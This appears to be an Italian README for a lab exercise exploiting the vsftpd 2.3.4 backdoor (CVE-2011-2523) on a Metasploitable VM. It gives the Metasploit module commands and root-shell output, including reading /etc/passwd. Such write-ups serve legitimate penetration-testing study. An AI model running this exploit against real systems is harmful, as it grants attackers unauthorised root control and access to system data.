
Valutazione delle vulnerabilità e sfruttamento di vsftpd 2.3.4 (CVE-2011-2523) tramite Metasploit. Report completo e prova dell'accesso root inclusi.
Sfruttamento di una vulnerabilità nota in
vsftpd 2.3.4tramite Metasploit.
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 contiene una backdoor malevola che apre una shell di comando sulla porta 6200 quando viene ricevuto un nome utente appositamente costruito (che termina con :)).
CVE: CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
L'accesso alla shell di root conferisce all'attaccante il pieno controllo del sistema target, inclusi escalation dei privilegi, movimento laterale, esfiltrazione dei dati e accesso persistente.
📝 Report PDF completo disponibile in questo repository: vsftpd-exploit-report.pdf
Creato con 🔥 da vedpakhare